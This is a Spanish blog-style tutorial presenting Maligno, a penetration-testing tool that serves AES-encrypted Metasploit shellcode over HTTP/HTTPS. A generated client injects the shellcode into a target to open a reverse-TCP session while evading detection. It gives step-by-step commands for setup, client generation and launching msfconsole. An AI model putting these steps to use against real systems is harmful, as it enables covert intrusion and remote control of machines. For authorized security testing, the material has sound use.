Servidor para Metasploit



En esta ocasión Maligno no tiene que ver con Chema Alonso . Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.

Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo. Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...






1.- Instala python-ipcalc (dependencia):

Cita:sudo apt-get update && sudo apt-get install python-ipcalc

2.- Descarga y descomprime Maligno:

Cita:http://www.encripto.no/tools/maligno-1.1.tar.gz

3.- Genera un certificado auto-firmado con el siguiente script:

Cita:./certgen.sh

4.- Configura el servidor Maligno ajustando las opciones en server.conf:

Cita:Echa un vistazo al fichero server.conf.explained

5.- Ejecuta el servidor Maligno:

Cita:python maligno_srv.py

6.- Genera un cliente:

Cita:python clientgen.py -i 0 -f server.conf -o my_client.py

Cita:-i: Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0)
-f: Fichero de configuración del servidor Maligno
-o: Fichero de salida donde se escribirá el código del cliente

7.- Manejador de Metasploit
Arranca msfconsole con el fichero de recursos generado por Maligno

Cita:msfconsole -r reverse_tcp_192.168.0.2_4444.rc

8.- Empieza a conseguir shells!

Autor:VICENTE MOTOS